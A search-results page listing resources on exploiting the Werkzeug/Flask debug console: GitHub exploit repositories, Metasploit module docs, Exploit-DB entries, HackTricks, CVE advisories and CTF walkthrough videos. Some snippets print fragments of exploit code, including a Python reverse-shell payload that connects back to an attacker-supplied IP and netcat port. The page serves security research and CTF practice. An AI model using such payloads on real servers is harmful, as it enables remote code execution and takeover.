GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution
python exploit for werkzeug debug shell command execution - Fare9/PyWerkzeug-Debug-Command-Execution
Starred by 10 users
Forked by 8 users
Languages Python 100.0% | Python 100.0%
Videos
Werkzeug PIN exploit - TryHackMe's OWASP Top 10 2021
20:59
Reassembling Werkzeug's Pin - Getting RCE in HackTheBox Agile [Part ...
19:10
Reassembling Werkzeug's Pin - Hacking Flask Debug Mode [Part 1] ...
15:27
Workerbee Walkthrough (Werkzeug Debug Pin generation) - YouTube
01:26:38
HackTheBox - Ellingson - YouTube
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
Written Exploits in different programming languages.. I Only write exploits that's missing from the Public. - Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
Author MistSpark
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
As explained by Carlos Polop in Hacktricks.xyz, this exploit is to access /console from Werkzeug when it requires a pin.
Author grav3m1nd-byte
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
print(info_message('Searching for the Werkzeug console ...')) · url = 'http://ptl-e7e6b59c-ecd77b90.libcurl.so/console' resp = requests.get(url) if resp.status_code != 200: print(error_message('Ouups something goes wrong')) sys.exit(1) ·
Author am0nsec
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.
Author rapid7
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
Do: set FLASKPATH /usr/local/lib/<python3.version>/site-packages/flask/app.py (where <python3.version> matches the version on the system being exploited) ... You should see a failure due to the check failing. Method of authentication. Valid values are: generated-cookie: Cookie generated from information provided about the application's environment. When this mode is used, the following additional options must be set: APPNAME: The name of the application according to Werkzeug.
Author rapid7
GitHub
github.com › magma2 › exploit › blob › master › werkzeug.py
exploit/werkzeug.py at master · magma2/exploit
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
·
· if len(sys.argv) != 5:
· print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
· sys.exit(-1)
·
·
· response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
·
· if "Werkzeug " not in response.text:
·
Author magma2
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.
Starred by 63 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
GitHub
github.com › advisories › GHSA-f9vj-2wh5-fj8j
Werkzeug safe_join not safe on Windows · CVE-2024-49766 · GitHub Advisory Database · GitHub
October 25, 2024 - Werkzeug's safe_join() relies on this check, and so can produce a path that is not safe, potentially allowing unintended access to data. Applications using Python >= 3.11, or not using Windows, are not vulnerable. ... This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS). / 10 ... Attack Vector: This metric reflects the context by which vulnerability exploitation ...
NIST
nvd.nist.gov › vuln › detail › cve-2024-34069
CVE-2024-34069 Detail - NVD
This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
HackTricks
book.hacktricks.xyz › network-services-pentesting › pentesting-web › werkzeug
Werkzeug / Flask Debug - HackTricks
You just have to write a python function that leaks a file content and you have your shell :) \xc2\xb7 GitHub · https://www.daehee.com/werkzeug-console-pin-exploit/
GitHub
github.com › vignesh21-git › werkzeug_debug_bypass_POC
GitHub - vignesh21-git/werkzeug_debug_bypass_POC: Werkzeug Console PIN Exploit · GitHub
By exploiting the path traversal vulnerability and gathering system information, we successfully generate the debug pin required to access the Werkzeug debugger console remotely.
Author vignesh21-git
Netapp
security.netapp.com › advisory › ntap-20240614-0004
CVE-2024-34069 Werkzeug Vulnerability in NetApp Products
June 14, 2024 - NetApp is an industry leader in developing and implementing product security standards. Learn how we can help you maintain the confidentiality, integrity, and availability of your data.
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution › blob › master › exploit_werkzeug.py
PyWerkzeug-Debug-Command-Execution/exploit_werkzeug.py at master · Fare9/PyWerkzeug-Debug-Command-Execution
Exploit para servidor Werkzeug · enviaremos una reverse shell · por tanto tendremos que tener un · netcat escuchando · ''' · import requests · import sys · import re · import urllib · · if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) ·
Author Fare9
Exploit-DB
exploit-db.com › exploits › 50101
Pallets Werkzeug 0.15.4 - Path Traversal - Python webapps Exploit
July 6, 2021 - # Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal # Date: 06 July 2021 # Original Author: Emre ÖVÜNÇ # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://palletsprojects.com/ # Software Link: ...